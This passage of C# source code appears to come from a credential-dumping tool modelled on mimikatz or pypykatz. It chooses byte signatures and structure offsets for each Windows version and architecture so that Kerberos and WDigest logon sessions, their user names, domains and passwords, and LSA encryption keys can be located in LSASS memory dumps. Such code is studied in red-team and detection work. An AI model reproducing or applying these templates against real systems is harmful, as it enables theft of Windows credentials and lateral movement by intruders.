template.signature = new byte[] { 0x48, 0x8b, 0x18, 0x48, 0x8d, 0x0d };
template.first_entry_offset = 6;
template.LogonSessionType = typeof(KIWI_KERBEROS_LOGON_SESSION_10_1607);
template.LogonSessionTypeSize = Marshal.SizeOf(typeof(KIWI_KERBEROS_LOGON_SESSION_10_1607));
template.PrimaryCredentialType = typeof(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607);
}
else
{
throw new Exception(String.Format("Could not identify template! Architecture: %s sysinfo.BuildNumber: %s", sysinfo.ProcessorArchitecture, sysinfo.BuildNumber));
}
template.SessionCredentialOffset = StructFieldOffset(template.LogonSessionType, "credentials");
template.SessionUserNameOffset = StructFieldOffset(template.PrimaryCredentialType, "UserName");
template.SessionDomainOffset = StructFieldOffset(template.PrimaryCredentialType, "Domain");
template.SessionPasswordOffset = StructFieldOffset(template.PrimaryCredentialType, "Password");
}
else if (sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.INTEL)
{
if ((int)SystemInfo.WindowsMinBuild.WIN_XP <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_2K3)
{
template.signature = new byte[] { 0x8B, 0x7D, 0x08, 0x8B, 0x17, 0x39, 0x50 };
template.first_entry_offset = -8;
}
else if ((int)SystemInfo.WindowsMinBuild.WIN_2K3 <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_VISTA)
{
template.signature = new byte[] { 0x8B, 0x7D, 0x08, 0x8B, 0x17, 0x39, 0x50 };
template.first_entry_offset = -8;
}
else if ((int)SystemInfo.WindowsMinBuild.WIN_VISTA <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_7)
{
template.signature = new byte[] { 0x53, 0x8b, 0x18, 0x50, 0x56 };
template.first_entry_offset = -11;
}
else if ((int)SystemInfo.WindowsMinBuild.WIN_7 <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_8)
{
template.signature = new byte[] { 0x53, 0x8b, 0x18, 0x50, 0x56 };
template.first_entry_offset = -11;
}
else if ((int)SystemInfo.WindowsMinBuild.WIN_8 <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsBuild.WIN_BLUE)
{
template.signature = new byte[] { 0x57, 0x8b, 0x38, 0x50, 0x68 };
template.first_entry_offset = -14;
}
else if ((int)SystemInfo.WindowsMinBuild.WIN_BLUE <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsBuild.WIN_10_1507)
{
template.signature = new byte[] { 0x56, 0x8b, 0x30, 0x50, 0x57 };
template.first_entry_offset = -15;
}
else if ((int)SystemInfo.WindowsBuild.WIN_10_1507 <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsBuild.WIN_10_1511)
{
//###DOUBLE CHECK THE STRUCTURES BELOW LINE!!!!
//### kerbHelper[N] -> KerberosReferences... {-15,7}}, here N= 7
template.signature = new byte[] { 0x56, 0x8b, 0x30, 0x50, 0x57 };
template.first_entry_offset = -15;
}
else if ((int)SystemInfo.WindowsBuild.WIN_10_1511 <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsBuild.WIN_10_1903)
{
template.signature = new byte[] { 0x56, 0x8b, 0x30, 0x50, 0x57 };
template.first_entry_offset = -15;
}
else if ((int)SystemInfo.WindowsBuild.WIN_10_1903 <= sysinfo.BuildNumber)
{
template.signature = new byte[] { 0x56, 0x8b, 0x30, 0x50, 0x53 };
template.first_entry_offset = -15;
}
}
else
{
throw new Exception($"Unknown architecture! {sysinfo.ProcessorArchitecture}");
}
return(template);
}
public static WdigestTemplate get_template(SystemInfo.MINIDUMP_SYSTEM_INFO sysinfo)
{
WdigestTemplate template = new WdigestTemplate();
template.USERNAME_OFFSET = 0x30;
template.HOSTNAME_OFFSET = 0x40;
template.PASSWORD_OFFSET = 0x50;
if (sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.AMD64)
{
if ((int)SystemInfo.WindowsMinBuild.WIN_XP <= sysinfo.BuildNumber &&
sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_2K3)
{
template.signature = new byte[] { 0x48, 0x3b, 0xda, 0x74 };
template.first_entry_offset = -4;
template.primary_offset = 36;
template.list_entry = new KIWI_WDIGEST_LIST_ENTRY();
}
else if ((int)SystemInfo.WindowsMinBuild.WIN_2K3 <= sysinfo.BuildNumber &&
sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_VISTA)
{
template.signature = new byte[] { 0x48, 0x3b, 0xda, 0x74 };
template.first_entry_offset = -4;
template.primary_offset = 48;
template.list_entry = new KIWI_WDIGEST_LIST_ENTRY();
}
else if (sysinfo.BuildNumber >= (int)SystemInfo.WindowsMinBuild.WIN_VISTA)
{
template.signature = new byte[] { 0x48, 0x3b, 0xd9, 0x74 };
template.first_entry_offset = -4;
template.primary_offset = 48;
template.list_entry = new KIWI_WDIGEST_LIST_ENTRY();
}
else
{
throw new Exception($"Unknown BuildNumber! {sysinfo.BuildNumber}");
}
}
else if (sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.INTEL)
{
if ((int)SystemInfo.WindowsMinBuild.WIN_XP <= sysinfo.BuildNumber &&
sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_2K3)
{
template.signature = new byte[] { 0x74, 0x18, 0x8b, 0x4d, 0x08, 0x8b, 0x11 };
template.first_entry_offset = -6;
template.primary_offset = 36;
template.list_entry = new KIWI_WDIGEST_LIST_ENTRY();
}
else if ((int)SystemInfo.WindowsMinBuild.WIN_2K3 <= sysinfo.BuildNumber &&
sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_VISTA)
{
template.signature = new byte[] { 0x74, 0x18, 0x8b, 0x4d, 0x08, 0x8b, 0x11 };
template.first_entry_offset = -6;
template.primary_offset = 28;
template.list_entry = new KIWI_WDIGEST_LIST_ENTRY();
}
else if ((int)SystemInfo.WindowsMinBuild.WIN_VISTA <= sysinfo.BuildNumber &&
sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_BLUE)
{
template.signature = new byte[] { 0x74, 0x11, 0x8b, 0x0b, 0x39, 0x4e, 0x10 };
template.first_entry_offset = -6;
template.primary_offset = 32;
template.list_entry = new KIWI_WDIGEST_LIST_ENTRY();
}
else if ((int)SystemInfo.WindowsMinBuild.WIN_BLUE <= sysinfo.BuildNumber &&
sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_10)
{
template.signature = new byte[] { 0x74, 0x15, 0x8b, 0x0a, 0x39, 0x4e, 0x10 };
template.first_entry_offset = -4;
template.primary_offset = 32;
template.list_entry = new KIWI_WDIGEST_LIST_ENTRY();
}
else if (sysinfo.BuildNumber >= (int)SystemInfo.WindowsMinBuild.WIN_10)
{
template.signature = new byte[] { 0x74, 0x15, 0x8b, 0x0a, 0x39, 0x4e, 0x10 };
template.first_entry_offset = -6;
template.primary_offset = 32;
template.list_entry = new KIWI_WDIGEST_LIST_ENTRY();
}
else
{
template.signature = new byte[] { 0x74, 0x15, 0x8b, 0x17, 0x39, 0x56, 0x10 };
template.first_entry_offset = -6;
template.primary_offset = 32;
template.list_entry = new KIWI_WDIGEST_LIST_ENTRY();
}
}
else
{
throw new Exception($"Unknown architecture! {sysinfo.ProcessorArchitecture}");
}
return(template);
}
public static LsaTemplate_NT6 get_template(SystemInfo.MINIDUMP_SYSTEM_INFO sysinfo)
{
var template = new LsaTemplate_NT6();
template.nt_major = "6";
if (sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.INTEL)
{
if (sysinfo.BuildNumber <= (int)SystemInfo.WindowsMinBuild.WIN_XP)
{
throw new Exception("Maybe implemented later");
}
else if (sysinfo.BuildNumber <= (int)SystemInfo.WindowsMinBuild.WIN_2K3)
{
template.nt_major = "5";
//template = templates["nt5"]["x86"]["1"];
template.key_pattern = new LSA_x86_1().key_pattern;
template.key_handle_struct = new LSA_x86_1().key_handle_struct;
template.key_struct = new LSA_x86_1().key_struct;
}
else if ((int)SystemInfo.WindowsMinBuild.WIN_VISTA <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_7)
{
//1
//template = templates["nt6"]["x86"]["1"];
template.key_pattern = new LSA_x86_1().key_pattern;
template.key_handle_struct = new LSA_x86_1().key_handle_struct;
template.key_struct = new LSA_x86_1().key_struct;
}
else if ((int)SystemInfo.WindowsMinBuild.WIN_7 <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_8)
{
//2
//template = templates["nt6"]["x86"]["2"];
template.key_pattern = new LSA_x86_2().key_pattern;
template.key_handle_struct = new LSA_x86_2().key_handle_struct;
template.key_struct = new LSA_x86_2().key_struct;
}
else if ((int)SystemInfo.WindowsMinBuild.WIN_8 <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_BLUE)
{
//3
//template = templates["nt6"]["x86"]["3"];
template.key_pattern = new LSA_x86_3().key_pattern;
template.key_handle_struct = new LSA_x86_3().key_handle_struct;
template.key_struct = new LSA_x86_3().key_struct;
}
else if ((int)SystemInfo.WindowsMinBuild.WIN_BLUE <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_10)
{
//4
//template = templates["nt6"]["x86"]["4"];
template.key_pattern = new LSA_x86_4().key_pattern;
template.key_handle_struct = new LSA_x86_4().key_handle_struct;
template.key_struct = new LSA_x86_4().key_struct;
}
else if ((int)SystemInfo.WindowsMinBuild.WIN_10 <= sysinfo.BuildNumber && sysinfo.BuildNumber <= (int)SystemInfo.WindowsBuild.WIN_10_1507)
{
//5
//template = templates["nt6"]["x86"]["5"];
template.key_pattern = new LSA_x86_5().key_pattern;
template.key_handle_struct = new LSA_x86_5().key_handle_struct;
template.key_struct = new LSA_x86_5().key_struct;
}
else if (sysinfo.BuildNumber > (int)SystemInfo.WindowsBuild.WIN_10_1507)
{
//6
//template = templates["nt6"]["x86"]["6"];
template.key_pattern = new LSA_x86_6().key_pattern;
template.key_handle_struct = new LSA_x86_6().key_handle_struct;
template.key_struct = new LSA_x86_6().key_struct;
}
}
else if (sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.AMD64)
{
if (sysinfo.BuildNumber <= (int)SystemInfo.WindowsMinBuild.WIN_XP)
{
throw new Exception("Maybe implemented later");
}
else if (sysinfo.BuildNumber <= (int)SystemInfo.WindowsMinBuild.WIN_2K3)
{
throw new Exception("Maybe implemented later");
}
else if (sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_7)
{
//vista
//1
//template = templates["nt6"]["x64"]["1"];
template.key_pattern = new LSA_x64_1().key_pattern;
template.key_handle_struct = new LSA_x64_1().key_handle_struct;
template.key_struct = new LSA_x64_1().key_struct;
}
else if (sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_8)
{
//win 7
//2
//template = templates["nt6"]["x64"]["2"];
template.key_pattern = new LSA_x64_2().key_pattern;
template.key_handle_struct = new LSA_x64_2().key_handle_struct;
template.key_struct = new LSA_x64_2().key_struct;
}
else if (sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_10)
{
//win 8 and blue
//3
if (sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_BLUE)
{
//template = templates["nt6"]["x64"]["3"];
template.key_pattern = new LSA_x64_3().key_pattern;
template.key_handle_struct = new LSA_x64_3().key_handle_struct;
template.key_struct = new LSA_x64_3().key_struct;
//win8
//3
}
else
{
//template = templates["nt6"]["x64"]["4"];
template.key_pattern = new LSA_x64_4().key_pattern;
template.key_handle_struct = new LSA_x64_4().key_handle_struct;
template.key_struct = new LSA_x64_4().key_struct;
//4
//win blue
}
}
else if (sysinfo.BuildNumber < (int)SystemInfo.WindowsBuild.WIN_10_1809)
{
//template = templates["nt6"]["x64"]["5"];
template.key_pattern = new LSA_x64_5().key_pattern;
template.key_handle_struct = new LSA_x64_5().key_handle_struct;
template.key_struct = new LSA_x64_5().key_struct;
//5
}
else
{
//template = templates["nt6"]["x64"]["6"];
template.key_pattern = new LSA_x64_6().key_pattern;
template.key_handle_struct = new LSA_x64_6().key_handle_struct;
template.key_struct = new LSA_x64_6().key_struct;
//1809
//6
}
}
else
{
throw new Exception($"Unknown architecture! {sysinfo.ProcessorArchitecture}");
}
return(template);
}
